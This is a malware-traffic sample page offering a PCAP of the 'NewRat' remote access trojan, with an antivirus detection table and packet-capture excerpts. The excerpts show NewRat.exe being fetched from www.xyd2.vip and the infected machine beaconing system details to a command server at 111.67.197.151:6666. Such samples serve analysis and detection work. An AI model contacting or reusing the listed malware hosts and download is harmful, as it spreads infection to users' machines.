111.67.197.151.6666 RAT Remote Access Trojan Malware Trojan PCAP File Download Traffic Sample

Download Attachments

  • pcap newrat
    Date added: December 17, 2016 5:35 am Added by: admin File size: 82 KB Downloads: 68

SHA256:     028f3aff1bbb9bdc57fd0ed7bff829b12a6f47872655f85e49001624ddb57e94
File name:     NewRat.exe
Detection ratio:     50 / 56
Analysis date:     2016-12-17 01:49:07 UTC ( 0 minutes ago )

Antivirus     Result     Update
ALYac     Generic.ServStart2.B7BD945B     20161217
AVG     Atros.BOTV     20161216
AVware     BehavesLike.Win32.Malware.wsc (mx-v)     20161217
Ad-Aware     Generic.ServStart2.B7BD945B     20161217
AegisLab     Troj.W32.Gen.mner     20161216
AhnLab-V3     Trojan/Win32.Regrun.R153612     20161216
Antiy-AVL     Trojan[:HEUR]/Win32.AGeneric     20161217
Arcabit     Generic.ServStart2.B7BD945B     20161217
Avast     Win32:Malware-gen     20161217
Avira (no cloud)     TR/Dldr.Yemrok.aona     20161216
Baidu     Win32.Trojan.ServStart.aw     20161207
BitDefender     Generic.ServStart2.B7BD945B     20161217
Bkav     W32.Clodf83.Trojan.75df     20161216
Comodo     TrojWare.Win32.GameThief.Magania.~NWABI     20161216
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20161024
Cyren     W32/NewMalware-Rootkit-I-based!     20161217

 

d

111.67.197.151.6666111.67.197.151.6666

2016-12-16 22:10:42.464406 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [P.], seq 0:285, ack 1, win 256, length 285: HTTP: GET /NewRat.exe HTTP/1.1
E..Eu^@……..f{……P{..R.:x.P….*..GET /NewRat.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.xyd2.vip
Connection: Keep-Alive

2016-12-16 22:10:42.771947 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 2921, win 256, length 0
E..(u_@……..f{……P{..o.:.]P….O……..
2016-12-16 22:10:43.055447 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 5841, win 256, length 0
E..(u`@……..f{……P{..o.:..P…
………

016-12-16 22:11:04.979590 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [S], seq 3889994307, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.x@….b…foC…..
…C…… ..A…………..
2016-12-16 22:11:05.234889 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 3576552473, win 256, length 0
E..(.y@….m…foC…..
…D.-..P………….
2016-12-16 22:11:05.247183 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [P.], seq 0:1164, ack 1, win 256, length 1164
E….z@……..foC…..
…D.-..P………..    …Win XP………………………………………………….Vip….2015…………………1..2499MHz………………….3389…………………………………………….
………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

 

2016-12-16 22:13:12.678256 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 7781, win 256, length 0
E..(WM@…/….f.:…..P.Y…j..P………….
2016-12-16 22:13:13.731458 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2184:2623, ack 7781, win 256, length 439: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
E…WN@…-….f.:…..P.Y…j..P…~…GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=70904-113270
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

2016-12-16 22:13:13.771889 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 9337, win 256, length 0
E..(WO@…/….f.:…..P.Y…j.3P….J……..
2016-12-16 22:13:14.795676 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2623:3063, ack 9337, win 256, length 440: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
E…WP@…-….f.:…..P.Y…j.3P…….GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=113271-202459
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

Leave a Reply